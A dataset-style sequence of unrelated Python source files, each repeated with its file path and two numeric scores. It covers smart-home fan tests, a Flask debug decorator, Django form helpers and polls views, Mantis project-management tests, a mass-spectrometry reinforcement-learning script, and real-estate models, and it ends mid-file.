assert state.attributes[fan.ATTR_PERCENTAGE] == 33
async def test_polling_stops_at_the_stop_event(opp: core.OpenPeerPower):
"""Test that polling stops at the stop event."""
await setup_platform(
opp, FAN_DOMAIN, ceiling_fan("name-1"), bond_device_id="test-device-id"
)
with patch_bond_device_state(side_effect=asyncio.TimeoutError):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=230))
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").state == STATE_UNAVAILABLE
opp.bus.async_fire(EVENT_OPENPEERPOWER_STOP)
opp.state = CoreState.stopping
await opp.async_block_till_done()
with patch_bond_device_state(return_value={"power": 1, "speed": 1}):
async_fire_time_changed(opp, utcnow() + timedelta(seconds=230))
await opp.async_block_till_done()
assert opp.states.get("fan.name_1").state == STATE_UNAVAILABLE | 0.78016 | 0.41561 |
class ServiceDebugger(object):
__enable_debug = True
@classmethod
def set_debug(cls, enable=True):
cls.__enable_debug = enable
@classmethod
def debug(cls, show_form=True, show_param=True, show_response=True, count_time=True, content_limit=100, disable=False):
from flask import request
from functools import wraps
from datetime import datetime
import traceback
if not cls.__enable_debug:
def empty_wrapper(func):
return func
return empty_wrapper
def make_wrapper(func):
@wraps(func)
def wrapper(**kwargs):
if not disable:
print("-" * 10)
print("Service:{}".format(func.__name__))
if show_param:
print("Param:")
for name in kwargs:
val = kwargs[name]
print("\t{0}: {1}".format(name, val))
if show_form:
print("FormData:")
for name in request.form:
print("\t{0}: {1}".format(name, str(request.form.get(name))[:content_limit]))
if count_time:
start_time = datetime.now()
print("StartTime:{}".format(start_time))
try:
resp = func(**kwargs)
except:
print(traceback.format_exc())
resp = ""
traceback.print_exc()
if not disable:
if count_time:
end_time = datetime.now()
print("EndTime:{}".format(end_time))
print("TimeCost:{}".format(end_time - start_time))
if show_response:
print("Return:" + resp[:content_limit])
return resp
return wrapper
return make_wrapper | FactorKeeper/Util/ServiceUtil/Debug.py | class ServiceDebugger(object):
__enable_debug = True
@classmethod
def set_debug(cls, enable=True):
cls.__enable_debug = enable
@classmethod
def debug(cls, show_form=True, show_param=True, show_response=True, count_time=True, content_limit=100, disable=False):
from flask import request
from functools import wraps
from datetime import datetime
import traceback
if not cls.__enable_debug:
def empty_wrapper(func):
return func
return empty_wrapper
def make_wrapper(func):
@wraps(func)
def wrapper(**kwargs):
if not disable:
print("-" * 10)
print("Service:{}".format(func.__name__))
if show_param:
print("Param:")
for name in kwargs:
val = kwargs[name]
print("\t{0}: {1}".format(name, val))
if show_form:
print("FormData:")
for name in request.form:
print("\t{0}: {1}".format(name, str(request.form.get(name))[:content_limit]))
if count_time:
start_time = datetime.now()
print("StartTime:{}".format(start_time))
try:
resp = func(**kwargs)
except:
print(traceback.format_exc())
resp = ""
traceback.print_exc()
if not disable:
if count_time:
end_time = datetime.now()
print("EndTime:{}".format(end_time))
print("TimeCost:{}".format(end_time - start_time))
if show_response:
print("Return:" + resp[:content_limit])
return resp
return wrapper
return make_wrapper | 0.359027 | 0.07658 |
from typing import Generator
from ..models import (
ClassRoom, Subject,
Teacher, Student, Group, Service,
Source, EventLocation,
)
from django import forms
from functools import partial
DateInput = partial(
forms.DateInput,
{'class': 'datepicker datepicker_now form-control'}
)
DateInputEmpty = partial(
forms.DateInput,
{'class': 'datepicker form-control'}
)
DateTimeInput = partial(
forms.DateTimeInput,
{'class': 'datepicker form-control'}
)
METHOD_DELETE = 'delete'
METHOD_EDIT = 'edit'
AVAILABLE_METHODS = [
METHOD_DELETE,
METHOD_EDIT,
]
def _prepare_choices(objects: list) -> list:
res = []
for o in objects:
res.append((o.id, str(o)))
return res
def get_classrooms() -> list:
cl_r = ClassRoom.objects.all()
res = []
for room in cl_r:
res.append((room.id, str(room)))
return res
def get_event_locations() -> list:
locations = EventLocation.objects.all()
return _prepare_choices(locations)
def get_subjects() -> list:
iter_ = Subject.objects.filter(status=Subject.Status.ACTIVE).all()
res = []
for i in iter_:
res.append((i.id, str(i.name)))
return res
def get_subjects_dummy() -> Generator:
yield '', ''
def get_teachers() -> list:
iter_ = Teacher.objects.filter(status=Teacher.Status.ACTIVE).all()
res = []
for i in iter_:
if i.subjects:
res.append((i.id, str(i)))
return res
def get_students() -> list:
iter_ = Student.objects.filter(status=Student.Status.ACTIVE).all()
return _prepare_choices(iter_)
def get_free_source_students() -> list:
iter_ = Student.objects.filter(
source=None,
).all()
return _prepare_choices(iter_)
def get_groups() -> list:
iter_ = Group.objects.all()
res = []
for i in iter_:
if i.students:
res.append((i.id, str(i)))
return res
def get_services() -> Generator:
res = Service.objects.all().values('id', 'name')
for row in res:
yield row['id'], row['name']
def get_service_type_of() -> list:
return Service.TypeOf.choices
def get_sources() -> Generator:
res = Source.objects.all().values('id', 'name')
for r in res:
yield r['id'], r['name']
def get_classrooms_types() -> list:
return ClassRoom.RoomType.choices | day_ok/schedule/forms/utils.py | from typing import Generator
from ..models import (
ClassRoom, Subject,
Teacher, Student, Group, Service,
Source, EventLocation,
)
from django import forms
from functools import partial
DateInput = partial(
forms.DateInput,
{'class': 'datepicker datepicker_now form-control'}
)
DateInputEmpty = partial(
forms.DateInput,
{'class': 'datepicker form-control'}
)
DateTimeInput = partial(
forms.DateTimeInput,
{'class': 'datepicker form-control'}
)
METHOD_DELETE = 'delete'
METHOD_EDIT = 'edit'
AVAILABLE_METHODS = [
METHOD_DELETE,
METHOD_EDIT,
]
def _prepare_choices(objects: list) -> list:
res = []
for o in objects:
res.append((o.id, str(o)))
return res
def get_classrooms() -> list:
cl_r = ClassRoom.objects.all()
res = []
for room in cl_r:
res.append((room.id, str(room)))
return res
def get_event_locations() -> list:
locations = EventLocation.objects.all()
return _prepare_choices(locations)
def get_subjects() -> list:
iter_ = Subject.objects.filter(status=Subject.Status.ACTIVE).all()
res = []
for i in iter_:
res.append((i.id, str(i.name)))
return res
def get_subjects_dummy() -> Generator:
yield '', ''
def get_teachers() -> list:
iter_ = Teacher.objects.filter(status=Teacher.Status.ACTIVE).all()
res = []
for i in iter_:
if i.subjects:
res.append((i.id, str(i)))
return res
def get_students() -> list:
iter_ = Student.objects.filter(status=Student.Status.ACTIVE).all()
return _prepare_choices(iter_)
def get_free_source_students() -> list:
iter_ = Student.objects.filter(
source=None,
).all()
return _prepare_choices(iter_)
def get_groups() -> list:
iter_ = Group.objects.all()
res = []
for i in iter_:
if i.students:
res.append((i.id, str(i)))
return res
def get_services() -> Generator:
res = Service.objects.all().values('id', 'name')
for row in res:
yield row['id'], row['name']
def get_service_type_of() -> list:
return Service.TypeOf.choices
def get_sources() -> Generator:
res = Source.objects.all().values('id', 'name')
for r in res:
yield r['id'], r['name']
def get_classrooms_types() -> list:
return ClassRoom.RoomType.choices | 0.507324 | 0.120646 |
import random
import string
from model.manage_projects_m import Project
def test_create_project(app):
app.session.login("administrator", "root")
# фунция для создания случайной последовательности значений
def random_string(prefix, maxlen):
symbols = string.ascii_letters + string.digits
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
# Определяем новый проект
project = Project(name=random_string("name", 20), description=random_string("description", 10))
# Получаем список проектов
old_list = app.manage_projects.get_projects_list()
# Создаём проект
app.manage_projects.create_project(project)
# Получаем обновленный список проектов
new_list = app.manage_projects.get_projects_list()
# Добавляем к старому списку новый проект
old_list.append(project)
assert sorted(old_list, key=Project.project_id_or_max) == sorted(new_list, key=Project.project_id_or_max)
def test_delete_project(app):
app.session.login("administrator", "root")
# фунция для создания случайной последовательности значений
def random_string(prefix, maxlen):
symbols = string.ascii_letters + string.digits
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
# Определяем новый проект
project = Project(name=random_string("name", 20), description=random_string("description", 10))
# Получаем список проектов
if len(app.manage_projects.get_projects_list()) == 0:
app.manage_projects.create_project(project)
# Получаем список проектов
old_list = app.manage_projects.get_projects_list()
# Удаляем первый по списку проект
app.manage_projects.delete_first_project()
# Получаем обновленный список проектов
new_list = app.manage_projects.get_projects_list()
# Убираем из старого списка удалённый проект
old_list.remove(project)
assert sorted(old_list, key=Project.project_id_or_max) == sorted(new_list, key=Project.project_id_or_max)
def test_create_project_via_soap(app):
username = "administrator"
password = "<PASSWORD>"
app.session.login(username, password)
parced_old_list = soap_projects_list(app, password, username)
# фунция для создания случайной последовательности значений
def random_string(prefix, maxlen):
symbols = string.ascii_letters + string.digits
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
project = Project(name=random_string("name", 20), description=random_string("description", 10))
# Создаём проект
app.manage_projects.create_project(project)
parced_new_list = soap_projects_list(app, password, username)
parced_old_list.append(project)
assert sorted(parced_old_list, key=Project.project_id_or_max) == sorted(parced_new_list, key=Project.project_id_or_max)
def test_delete_project_via_soap(app):
username = "administrator"
password = "<PASSWORD>"
app.session.login(username, password)
# фунция для создания случайной последовательности значений
def random_string(prefix, maxlen):
symbols = string.ascii_letters + string.digits
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
# Определяем новый проект
project = Project(name=random_string("name", 20), description=random_string("description", 10))
parced_old_list = soap_projects_list(app, password, username)
# Проверяем, есть ли проекты вообще. Добавляем при необходимости
if len(parced_old_list) == 0:
app.manage_projects.create_project(project)
# Получаем список проектов
parced_old_list = soap_projects_list(app, password, username)
# Удаляем первый по списку проект
app.manage_projects.delete_first_project()
# Получаем обновленный список проектов
parced_new_list = soap_projects_list(app, password, username)
# Убираем из старого списка удалённый проект
parced_old_list.remove(project)
assert sorted(parced_old_list, key=Project.project_id_or_max) == sorted(parced_new_list, key=Project.project_id_or_max)
def soap_projects_list(app, password, username):
# Получаем список проектов
unparsed_list = app.soap.get_projects_list(username, password)
assert unparsed_list
parced_old_list = app.manage_projects.get_projects_list_from_soap(unparsed_list)
assert parced_old_list
return parced_old_list | test/test_manage_projects.py | import random
import string
from model.manage_projects_m import Project
def test_create_project(app):
app.session.login("administrator", "root")
# фунция для создания случайной последовательности значений
def random_string(prefix, maxlen):
symbols = string.ascii_letters + string.digits
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
# Определяем новый проект
project = Project(name=random_string("name", 20), description=random_string("description", 10))
# Получаем список проектов
old_list = app.manage_projects.get_projects_list()
# Создаём проект
app.manage_projects.create_project(project)
# Получаем обновленный список проектов
new_list = app.manage_projects.get_projects_list()
# Добавляем к старому списку новый проект
old_list.append(project)
assert sorted(old_list, key=Project.project_id_or_max) == sorted(new_list, key=Project.project_id_or_max)
def test_delete_project(app):
app.session.login("administrator", "root")
# фунция для создания случайной последовательности значений
def random_string(prefix, maxlen):
symbols = string.ascii_letters + string.digits
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
# Определяем новый проект
project = Project(name=random_string("name", 20), description=random_string("description", 10))
# Получаем список проектов
if len(app.manage_projects.get_projects_list()) == 0:
app.manage_projects.create_project(project)
# Получаем список проектов
old_list = app.manage_projects.get_projects_list()
# Удаляем первый по списку проект
app.manage_projects.delete_first_project()
# Получаем обновленный список проектов
new_list = app.manage_projects.get_projects_list()
# Убираем из старого списка удалённый проект
old_list.remove(project)
assert sorted(old_list, key=Project.project_id_or_max) == sorted(new_list, key=Project.project_id_or_max)
def test_create_project_via_soap(app):
username = "administrator"
password = "<PASSWORD>"
app.session.login(username, password)
parced_old_list = soap_projects_list(app, password, username)
# фунция для создания случайной последовательности значений
def random_string(prefix, maxlen):
symbols = string.ascii_letters + string.digits
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
project = Project(name=random_string("name", 20), description=random_string("description", 10))
# Создаём проект
app.manage_projects.create_project(project)
parced_new_list = soap_projects_list(app, password, username)
parced_old_list.append(project)
assert sorted(parced_old_list, key=Project.project_id_or_max) == sorted(parced_new_list, key=Project.project_id_or_max)
def test_delete_project_via_soap(app):
username = "administrator"
password = "<PASSWORD>"
app.session.login(username, password)
# фунция для создания случайной последовательности значений
def random_string(prefix, maxlen):
symbols = string.ascii_letters + string.digits
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
# Определяем новый проект
project = Project(name=random_string("name", 20), description=random_string("description", 10))
parced_old_list = soap_projects_list(app, password, username)
# Проверяем, есть ли проекты вообще. Добавляем при необходимости
if len(parced_old_list) == 0:
app.manage_projects.create_project(project)
# Получаем список проектов
parced_old_list = soap_projects_list(app, password, username)
# Удаляем первый по списку проект
app.manage_projects.delete_first_project()
# Получаем обновленный список проектов
parced_new_list = soap_projects_list(app, password, username)
# Убираем из старого списка удалённый проект
parced_old_list.remove(project)
assert sorted(parced_old_list, key=Project.project_id_or_max) == sorted(parced_new_list, key=Project.project_id_or_max)
def soap_projects_list(app, password, username):
# Получаем список проектов
unparsed_list = app.soap.get_projects_list(username, password)
assert unparsed_list
parced_old_list = app.manage_projects.get_projects_list_from_soap(unparsed_list)
assert parced_old_list
return parced_old_list | 0.264928 | 0.358185 |
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponseRedirect, HttpResponse
from django.core.urlresolvers import reverse
from django.views import generic
from .models import Question, Choice
from django.utils import timezone
from .forms import SearchForm
from django.forms.models import modelformset_factory
class IndexView(generic.ListView):
template_name= 'polls/index.html'
context_object_name = 'latest_question_list'
def get_queryset(self):
return Question.objects.filter(
pub_date__lte=timezone.now()
).order_by('-pub_date')[:5]
class DetailView(generic.DetailView):
model = Question
template_name = 'polls/detail.html'
def get_queryset(self):
return Question.objects.filter(pub_date__lte=timezone.now())
class ResultsView(generic.DetailView):
model = Question
template_name = 'polls/results.html'
def vote(req, question_id):
p = get_object_or_404(Question, pk=question_id)
try:
selected_choice = p.choice_set.get(pk=req.POST['choice'])
except (KeyError, Choice.DoesNotExist):
return render(req, 'polls/detail.html', {
'question': p,
'error_message': "You didn't select a choice",
})
else:
selected_choice.votes += 1
selected_choice.save()
return HttpResponseRedirect(reverse('polls:results', args=(p.id,)))
def search_form(req):
form = SearchForm()
return render(req, 'polls/search_form.html', {"form": form})
def search(req):
if req.method == 'GET':
if req.GET.get('question_id'):
questions = Question.objects.filter(id=req.GET["question_id"])
elif req.GET.get("question_text"):
questions = Question.objects.filter(question_text__icontains=req.GET["question_text"])
formset = modelformset_factory(Question, form=SearchForm)
form = formset(queryset=questions)
zipped = zip(form, questions)
return render(req, 'polls/search.html', {'questions': questions, 'form': form, 'zipped': zipped})
else:
form = SearchForm()
return HttpResponseRedirect(reverse('polls:index'))
def edit(req, question_id):
q = get_object_or_404(Question,pk=question_id)
if req.method == 'POST':
forms = SearchForm(req.POST, instance=q)
forms.save()
return HttpResponseRedirect(reverse('polls:index'))
else:
form = SearchForm(instance=q)
return render(req, 'polls/edit.html', {'form': form}) | polls/views.py | from django.shortcuts import render, get_object_or_404
from django.http import HttpResponseRedirect, HttpResponse
from django.core.urlresolvers import reverse
from django.views import generic
from .models import Question, Choice
from django.utils import timezone
from .forms import SearchForm
from django.forms.models import modelformset_factory
class IndexView(generic.ListView):
template_name= 'polls/index.html'
context_object_name = 'latest_question_list'
def get_queryset(self):
return Question.objects.filter(
pub_date__lte=timezone.now()
).order_by('-pub_date')[:5]
class DetailView(generic.DetailView):
model = Question
template_name = 'polls/detail.html'
def get_queryset(self):
return Question.objects.filter(pub_date__lte=timezone.now())
class ResultsView(generic.DetailView):
model = Question
template_name = 'polls/results.html'
def vote(req, question_id):
p = get_object_or_404(Question, pk=question_id)
try:
selected_choice = p.choice_set.get(pk=req.POST['choice'])
except (KeyError, Choice.DoesNotExist):
return render(req, 'polls/detail.html', {
'question': p,
'error_message': "You didn't select a choice",
})
else:
selected_choice.votes += 1
selected_choice.save()
return HttpResponseRedirect(reverse('polls:results', args=(p.id,)))
def search_form(req):
form = SearchForm()
return render(req, 'polls/search_form.html', {"form": form})
def search(req):
if req.method == 'GET':
if req.GET.get('question_id'):
questions = Question.objects.filter(id=req.GET["question_id"])
elif req.GET.get("question_text"):
questions = Question.objects.filter(question_text__icontains=req.GET["question_text"])
formset = modelformset_factory(Question, form=SearchForm)
form = formset(queryset=questions)
zipped = zip(form, questions)
return render(req, 'polls/search.html', {'questions': questions, 'form': form, 'zipped': zipped})
else:
form = SearchForm()
return HttpResponseRedirect(reverse('polls:index'))
def edit(req, question_id):
q = get_object_or_404(Question,pk=question_id)
if req.method == 'POST':
forms = SearchForm(req.POST, instance=q)
forms.save()
return HttpResponseRedirect(reverse('polls:index'))
else:
form = SearchForm(instance=q)
return render(req, 'polls/edit.html', {'form': form}) | 0.33546 | 0.083217 |
import sys
from os.path import exists
sys.path.append('../..')
import numpy as np
from loguru import logger
from stable_baselines3 import DQN
from stable_baselines3.common.vec_env import DummyVecEnv
from stable_baselines3.common.monitor import Monitor
from vimms.Common import POSITIVE, load_obj, save_obj
from vimms.ChemicalSamplers import MZMLFormulaSampler, MZMLRTandIntensitySampler, \
MZMLChromatogramSampler, GaussianChromatogramSampler
from vimms.Roi import RoiBuilderParams
from vimms_gym.env import DDAEnv
n_chemicals = (2000, 2000)
mz_range = (70, 1000)
rt_range = (0, 1440)
intensity_range = (1E4, 1E20)
min_mz = mz_range[0]
max_mz = mz_range[1]
min_rt = rt_range[0]
max_rt = rt_range[1]
min_log_intensity = np.log(intensity_range[0])
max_log_intensity = np.log(intensity_range[1])
isolation_window = 0.7
N = 10
rt_tol = 120
mz_tol = 10
min_ms1_intensity = 5000
ionisation_mode = POSITIVE
enable_spike_noise = True
noise_density = 0.1
noise_max_val = 1E3
mzml_filename = '../notebooks/fullscan_QCB.mzML'
samplers = None
samplers_pickle = '../notebooks/samplers_fullscan_QCB.mzML.p'
if exists(samplers_pickle):
logger.info('Loaded %s' % samplers_pickle)
samplers = load_obj(samplers_pickle)
mz_sampler = samplers['mz']
ri_sampler = samplers['rt_intensity']
cr_sampler = samplers['chromatogram']
else:
logger.info('Creating samplers from %s' % mzml_filename)
mz_sampler = MZMLFormulaSampler(mzml_filename, min_mz=min_mz, max_mz=max_mz)
ri_sampler = MZMLRTandIntensitySampler(mzml_filename, min_rt=min_rt, max_rt=max_rt,
min_log_intensity=min_log_intensity,
max_log_intensity=max_log_intensity)
roi_params = RoiBuilderParams(min_roi_length=3, at_least_one_point_above=1000)
cr_sampler = MZMLChromatogramSampler(mzml_filename, roi_params=roi_params)
samplers = {
'mz': mz_sampler,
'rt_intensity': ri_sampler,
'chromatogram': cr_sampler
}
save_obj(samplers, samplers_pickle)
params = {
'chemical_creator': {
'mz_range': mz_range,
'rt_range': rt_range,
'intensity_range': intensity_range,
'n_chemicals': n_chemicals,
'mz_sampler': mz_sampler,
'ri_sampler': ri_sampler,
'cr_sampler': GaussianChromatogramSampler(),
},
'noise': {
'enable_spike_noise': enable_spike_noise,
'noise_density': noise_density,
'noise_max_val': noise_max_val,
'mz_range': mz_range
},
'env': {
'ionisation_mode': ionisation_mode,
'rt_range': rt_range,
'isolation_window': isolation_window,
'mz_tol': mz_tol,
'rt_tol': rt_tol,
}
}
max_peaks = 200
env = DDAEnv(max_peaks, params)
env_name = 'DDAEnv'
# modified parameters
learning_rate = 0.0001
batch_size = 512
gamma = 0.90
exploration_fraction = 0.25
exploration_initial_eps = 1.0
exploration_final_eps = 0.10
hidden_nodes = 512
total_timesteps = 2000
net_arch = [hidden_nodes, hidden_nodes]
policy_kwargs = dict(net_arch=net_arch)
env = DDAEnv(max_peaks, params)
env = Monitor(env)
env = DummyVecEnv([lambda: env])
model = DQN('MultiInputPolicy', env,
learning_rate=learning_rate, batch_size=batch_size, gamma=gamma,
exploration_fraction=exploration_fraction,
exploration_initial_eps=exploration_initial_eps,
exploration_final_eps=exploration_final_eps,
policy_kwargs=policy_kwargs, verbose=2)
model.learn(total_timesteps=total_timesteps, log_interval=1) | vimms_gym/debug_training.py | import sys
from os.path import exists
sys.path.append('../..')
import numpy as np
from loguru import logger
from stable_baselines3 import DQN
from stable_baselines3.common.vec_env import DummyVecEnv
from stable_baselines3.common.monitor import Monitor
from vimms.Common import POSITIVE, load_obj, save_obj
from vimms.ChemicalSamplers import MZMLFormulaSampler, MZMLRTandIntensitySampler, \
MZMLChromatogramSampler, GaussianChromatogramSampler
from vimms.Roi import RoiBuilderParams
from vimms_gym.env import DDAEnv
n_chemicals = (2000, 2000)
mz_range = (70, 1000)
rt_range = (0, 1440)
intensity_range = (1E4, 1E20)
min_mz = mz_range[0]
max_mz = mz_range[1]
min_rt = rt_range[0]
max_rt = rt_range[1]
min_log_intensity = np.log(intensity_range[0])
max_log_intensity = np.log(intensity_range[1])
isolation_window = 0.7
N = 10
rt_tol = 120
mz_tol = 10
min_ms1_intensity = 5000
ionisation_mode = POSITIVE
enable_spike_noise = True
noise_density = 0.1
noise_max_val = 1E3
mzml_filename = '../notebooks/fullscan_QCB.mzML'
samplers = None
samplers_pickle = '../notebooks/samplers_fullscan_QCB.mzML.p'
if exists(samplers_pickle):
logger.info('Loaded %s' % samplers_pickle)
samplers = load_obj(samplers_pickle)
mz_sampler = samplers['mz']
ri_sampler = samplers['rt_intensity']
cr_sampler = samplers['chromatogram']
else:
logger.info('Creating samplers from %s' % mzml_filename)
mz_sampler = MZMLFormulaSampler(mzml_filename, min_mz=min_mz, max_mz=max_mz)
ri_sampler = MZMLRTandIntensitySampler(mzml_filename, min_rt=min_rt, max_rt=max_rt,
min_log_intensity=min_log_intensity,
max_log_intensity=max_log_intensity)
roi_params = RoiBuilderParams(min_roi_length=3, at_least_one_point_above=1000)
cr_sampler = MZMLChromatogramSampler(mzml_filename, roi_params=roi_params)
samplers = {
'mz': mz_sampler,
'rt_intensity': ri_sampler,
'chromatogram': cr_sampler
}
save_obj(samplers, samplers_pickle)
params = {
'chemical_creator': {
'mz_range': mz_range,
'rt_range': rt_range,
'intensity_range': intensity_range,
'n_chemicals': n_chemicals,
'mz_sampler': mz_sampler,
'ri_sampler': ri_sampler,
'cr_sampler': GaussianChromatogramSampler(),
},
'noise': {
'enable_spike_noise': enable_spike_noise,
'noise_density': noise_density,
'noise_max_val': noise_max_val,
'mz_range': mz_range
},
'env': {
'ionisation_mode': ionisation_mode,
'rt_range': rt_range,
'isolation_window': isolation_window,
'mz_tol': mz_tol,
'rt_tol': rt_tol,
}
}
max_peaks = 200
env = DDAEnv(max_peaks, params)
env_name = 'DDAEnv'
# modified parameters
learning_rate = 0.0001
batch_size = 512
gamma = 0.90
exploration_fraction = 0.25
exploration_initial_eps = 1.0
exploration_final_eps = 0.10
hidden_nodes = 512
total_timesteps = 2000
net_arch = [hidden_nodes, hidden_nodes]
policy_kwargs = dict(net_arch=net_arch)
env = DDAEnv(max_peaks, params)
env = Monitor(env)
env = DummyVecEnv([lambda: env])
model = DQN('MultiInputPolicy', env,
learning_rate=learning_rate, batch_size=batch_size, gamma=gamma,
exploration_fraction=exploration_fraction,
exploration_initial_eps=exploration_initial_eps,
exploration_final_eps=exploration_final_eps,
policy_kwargs=policy_kwargs, verbose=2)
model.learn(total_timesteps=total_timesteps, log_interval=1) | 0.311113 | 0.234177 |
from __future__ import absolute_import
# development system imports
import os
import random
import uuid
from datetime import date, datetime, timedelta
from decimal import Decimal
from django.conf import settings
from django.contrib.auth.models import AbstractUser
from django.contrib.humanize.templatetags import humanize
from django.core.exceptions import ValidationError
from django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator
from django.db.models import (
CASCADE,
SET_NULL,
BooleanField,
CharField,
DateField,
DateTimeField,
DecimalField,
EmailField,
FileField,
ForeignKey,
GenericIPAddressField,
ImageField,
IntegerField,
ManyToManyField,
OneToOneField,
PositiveIntegerField,
SlugField,
TextChoices,
TextField,
URLField,
UUIDField,
)
from django.db.models.fields import FloatField
from django.template.loader import get_template, render_to_string
from django.urls import reverse
from django.utils import timezone
from django.utils.translation import gettext_lazy as _
from django_resized import ResizedImageField
from model_utils import Choices
from model_utils.fields import StatusField
from model_utils.models import TimeStampedModel
from tinymce.models import HTMLField
User = settings.AUTH_USER_MODEL
phone_regex = RegexValidator(regex=r'^\+?1?\d{9,15}$', message="Phone number must be entered in the format: '+999999999'. Up to 15 digits allowed.")
char_regex = RegexValidator(regex=r'^[A-Za-z]*$', message="Field must be only alphabets: A-Z or a-z")
def get_filename_ext(filepath):
base_name = os.path.basename(filepath)
name, ext = os.path.splitext(base_name)
return name, ext
def property_images(instance, filename):
new_filename = random.randint(1, 3910209312)
name, ext = get_filename_ext(filename)
final_filename = "{new_filename}{ext}".format(new_filename=new_filename, ext=ext)
return "property-photo/{new_filename}/{final_filename}".format(
new_filename=new_filename, final_filename=final_filename
)
def blueprint_image(instance, filename):
new_filename = random.randint(1, 3910209312)
name, ext = get_filename_ext(filename)
final_filename = "{new_filename}{ext}".format(new_filename=new_filename, ext=ext)
return "property-blueprint/{new_filename}/{final_filename}".format(
new_filename=new_filename, final_filename=final_filename
)
def property_video(instance, filename):
new_filename = random.randint(1, 3910209312)
name, ext = get_filename_ext(filename)
final_filename = "{new_filename}{ext}".format(new_filename=new_filename, ext=ext)
return "property-video/{new_filename}/{final_filename}".format(
new_filename=new_filename, final_filename=final_filename
)
# Create your models here.
class City(TimeStampedModel):
title = CharField(max_length=30, null=True, blank=True, unique=True)
def __str__(self):
return f"{self.title}"
class Meta:
managed = True
verbose_name = "City"
verbose_name_plural = "Cities"
ordering = ["title"]
class State(TimeStampedModel):
title = CharField(max_length=30, null=True, blank=True, unique=True)
def __str__(self):
return f"{self.title}"
class Meta:
managed = True
verbose_name = "State"
verbose_name_plural = "States"
ordering = ["title"]
class PropertyFeature(TimeStampedModel):
AC = "Air Conditioning"
POOL = "Swimming Pool"
HEAT = "Central Heating"
LAUNDRY = "Laundry Room"
GYM = "Gym"
ALARM = "Alarm"
INTERNET = "Internet"
GARAGE = "Garage"
GARDEN = "Garden"
PARKING = "Parking Lot"
EXERCISE = "Exercise Room"
COOLING = "Central Cooling"
STORAGE = "Srorage Room"
WATER = "Treated Water"
PROPERTY_FEATURES = (
(AC, "Air Conditioning"),
(POOL, "Swimming Pool"),
(HEAT, "Central Heating"),
(LAUNDRY, "Laundry Room"),
(PARKING, "Parking Lot"),
(EXERCISE, "Exercise Room"),
(COOLING, "Central Cooling"),
(STORAGE, "Srorage Room"),
(WATER, "Treated Water"),
(INTERNET, "Internet"),
(GARAGE, "Attached Garage"),
(GARDEN, "Garden"),
(GYM, "Gym"),
(ALARM, "Alarm"),
)
property_features = CharField(_("Property Features (Optional)"), max_length=17, choices=PROPERTY_FEATURES, default=POOL, null=True, blank=True, unique=True)
def __str__(self):
return str(self.property_features)
class Meta:
managed = True
verbose_name = "Property Feature"
verbose_name_plural = "Property Features"
ordering = ["property_features"]
class Property(TimeStampedModel):
SOLD = "Sold"
BUY = "Buy"
RENT = "Rent"
DEVELOP = "Develop"
SHORTLET = "Shortlet"
PROPERTY_STATUS = (
(SOLD, "Sold"),
(BUY, "Buy"),
(RENT, "Rent"),
(DEVELOP, "Develop"),
(SHORTLET, "Shortlet"),
)
APARTMENT = "Apartment"
HOUSE = "House"
COMMERCIAL = "Commercial"
GARAGE = "Garage"
GARDEN = "Garden"
LOT = "Lot"
PLOT = "Plot"
PROPERTY_TYPE = (
(APARTMENT, "Apartment"),
(HOUSE, "House"),
(COMMERCIAL, "Commercial"),
(GARAGE, "Garage"),
(GARDEN, "Garden"),
(LOT, "Lot"),
(PLOT, "Plot"),
)
ONE = 1
TWO = 2
THREE = 3
FOUR = 4
FIVE = 5
SIX = 00
ROOMS = (
(ONE, "1 Room"),
(TWO, "2 Rooms"),
(THREE, "3 Rooms"),
(FOUR, "4 Rooms"),
(FIVE, "5 Rooms"),
(SIX, "More than 5 Rooms"),
)
ANNUAL = "Annually"
MONTHLY = "Monthly"
SQFT = "Sq/Ft"
PRICE_TYPE = (
(ANNUAL , "Annually"),
(MONTHLY , "Monthly"),
(SQFT , "Sq/Ft"),
)
ZEROONE = "0 - 1"
ZEROFIVE = "0 - 5"
ZEROTEN = "0 - 10"
ZEROTWENTY = "0 - 20"
ZEROFIFTY = "0 - 50"
FITYPLUS = "50 - more"
PROPERTY_AGE = (
(ZEROONE, "0 - 1"),
(ZEROFIVE, "0 - 5"),
(ZEROTEN, "0 - 10"),
(ZEROTWENTY, "0 - 20"),
(ZEROFIFTY, "0 - 50"),
(FITYPLUS, "50 - more"),
)
property_agent = ForeignKey(User, on_delete=CASCADE, related_name="agentproperty")
property_title = CharField(_("Property Title"), null=True, blank=False, max_length=500)
slug = SlugField(max_length=700, blank=True, null=True, unique=True)
property_status = CharField(_("Property Status"), max_length=8, choices=PROPERTY_STATUS, default=RENT, null=True, blank=True)
property_type = CharField(_("Property Type"), max_length=15, choices=PROPERTY_TYPE, default=APARTMENT, null=True, blank=True)
property_price_type = CharField(_("Property Price Type"), max_length=15, choices=PRICE_TYPE, default=ANNUAL, null=True, blank=False)
property_price = DecimalField(_("Property Price (for 1 year or 1 sq/ft)"), max_digits=20, decimal_places=2, default=0.00, blank=False, help_text="if your price type is sq/ft, then the price cost should be by a unit of the property area square feet and leave the total we will automatically round it up for you by the total area numbers you have ")
property_area = DecimalField(_("Per Sq/Ft"), max_digits=20, decimal_places=2, default=0.00, blank=True)
property_area_number = IntegerField(_("How many sq/ft do you have of the above property per sq/ft? i.e (5 Per Sq/Ft x 10 = 50 Total Square Feet) leave it empty for rented properties"), default=1, null=True, blank=True, help_text="From 1-1000. to calculate to total price for square feets")
property_bathrooms = IntegerField(_("Bath Rooms"), choices=ROOMS, default=ONE, null=True, blank=False)
property_bedrooms = IntegerField(_("Bed Rooms"), choices=ROOMS, default=ONE, null=True, blank=False)
property_parlors = IntegerField(_("Parlors"), choices=ROOMS, default=ONE, null=True, blank=False)
property_latitude = FloatField(_("Map Latitude"), null=True, default=0.000000000, validators=[MinValueValidator(-90.000000000), MaxValueValidator(90.000000000)], help_text="You can find this on google maps by inputing the actual property address and right clicking on the location pointer to reveal the latitude")
